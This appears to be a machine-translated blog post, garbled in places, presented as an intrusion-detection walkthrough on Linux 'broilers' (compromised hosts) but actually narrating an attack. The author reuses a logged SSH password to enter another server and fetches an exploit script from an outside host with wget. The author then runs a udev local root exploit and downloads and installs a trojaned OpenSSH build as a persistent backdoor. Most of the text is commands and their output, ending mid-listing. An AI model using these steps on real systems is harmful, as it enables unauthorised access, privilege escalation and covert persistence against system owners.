A simple manual intrusion detection process for linux broilers

Today, I found someone's ssh on a zombie is connected to another server, and the password is recorded. [Root @ mail ~] # Cat/tmp/sshpswdldc: sle823jfsGs@222.222.66.11 directly ssh up. [Root @ mail ~] # Sshldc@222.222.66.11ldc @ 222.222.66.11spassword: La

Today, I found someone's ssh on a zombie is connected to another server, and the password is recorded.

[Root @ mail ~] # Cat/tmp/sshpswd
Ldc: sle823jfsGs@222.222.66.11

Directly go to ssh.

[Root @ mail ~] # Ssh ldc@222.222.66.11
A ldc@222.222.66.11s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[Ldc @ localhost ldc] $ cat/etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel on an m

[Ldc @ localhost ldc] $ uname-
Linux localhost. localdomain 2.6.18-8. el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

Yes, rhel5.0 has not upgraded the kernel. The local root of vmsplice should be okay. However, after testing, the machine crashes and udev is better.

[Ldc @ localhost ldc] $ mkdir. v
[Ldc @ localhost ldc] $ cd. v
[Ldc @ localhost. v] $ wget http: // 211.100.50.70/u. sh
? 13:21:09? Http: // 211.100.50.70/u. sh
Connecting to 211.100.50.70: 80... .. 200 OK
366 (3.3 K) [application/x-sh]
Saving to: 'U. SH'
100% [============================================== ========================================================== ===========>] 3,366 --. -K/s in 0.04 s

13:21:09 (93.7 KB/s)-'U. sh saved [3366/3366]

[Ldc @ localhost. v] $ ls
R00t r00t. c u. sh
[Ldc @ localhost. v] $ chmod + x u. sh
[Ldc @ localhost. v] $ cat/proc/net/netlink
Sk Eth Pid Groups Rmem Wmem Dump Locks
F69f8800 0 2486 00000111 0 0 00000000 2
F7fdae00 0 0 00000000 0 00000000 2
C2132200 6 0 00000000 0 0 00000000 2
F6a57a00 7 2143 00000001 0 0 00000000 2
F7caf000 7 0 00000000 0 0 00000000 2
F6a0be00 9 2143 00000000 0 0 00000000 2
F6a61200 9 1996 00000000 0 0 00000000 2
F7de1c00 9 0 00000000 0 0 00000000 2
F7d6ca00 10 0 00000000 0 0 00000000 2
F7fb3200 11 0 00000000 0 0 00000000 2
C2154200 15 476 ffffffff 0 0 00000000 2
F7fdac00 15 0 00000000 0 0 00000000 2
F7fb3000 16 0 00000000 0 0 00000000 2
C21cde00 18 0 00000000 0 0 00000000 2
[Ldc @ localhost. v] $ ps aux | grep udev
Root 477 0.0 0.0 2916 1396? S </sbin/udevd-d
Ldc 3462 0.0 0.0 4128 pts/0 S grep udev
[Ldc @ localhost. v] $ sh u. sh 476
Suid. c:
Suid. c: 3:

Sh-3.1 # id
Uid = 0 (root) gid = 0 (root) groups = 0 (root), 1 (bin), 2 (daemon), 3 (sys), 4 (adm ), 6 (disk), 10 (wheel) context = system_u: system_r: unconfined_t: SystemLow-SystemHigh

It is already the root permission.

Sh-3.1 # w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
User tty from login @ IDLE JCPU PCPU WHAT
Ldc pts/0 100.204.107.20 13:05 0.00 s 0.12 s 0.06 s sshd: ldc [priv]
Sh-3.1 # pwd
/Home/ldc/. v
Sh-3.1 # ssh-V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

Leave an ssh backdoor first.

Sh-3.1 # wget http: // 211.100.50.70/openssh4.3p2.tar.gz
? 13:32:08? Http: // 211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70: 80... 200 OK
79990 (957 K) [application/x-gzip]
Saving to: 'openssh4.3p2.tar.gz'

100%

[===================================================== ========================================================== ============>] 979,990 1.14 M/s in 0.8 s

13:32:08 (1.14 MB/s)-'openssh4.3p2.tar.gz saved [979990/979990]

Sh-3.1 # tar zxf openssh4.3p2.tar.gz
Sh-3.1 # cd openssh-4.3p2/
Sh-3.1 #./configure -- prefix =/usr -- sysconfdir =/etc/ssh
Checking for gcc... gcc
Checking for C compiler default output file name... a. out
............ (Omit several rows)

Sh-3.1 # make & make install
Conffile = 'echo sshd_config.out | sed s/. out $ //';
/Bin/sed-e s |/etc/ssh/ssh_prng_cmds | g-e
............ (Omit several rows)

Sh-3.1 # cp ssh_config sshd_config/etc/ssh/
Sh-3.1 #/etc/rc. d/init. d/sshd restart
STOP sshd [OK]
START sshd [OK]

OK. use our sshdoor to log on.

[Root @ localhost ~] # Id
Uid = 0 (root) gid = 0 (root) groups = 0 (root), 1 (bin), 2 (daemon), 3 (sys), 4 (adm ), 6 (disk), 10 (wheel) context = system_u: system_r: unconfined_t: SystemLow-SystemHigh

[Root @ localhost ~] # Netstat-lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
Tcp 0 0 127.0.0.1: 2208 0.0.0.0: * LISTEN 2298/hpiod &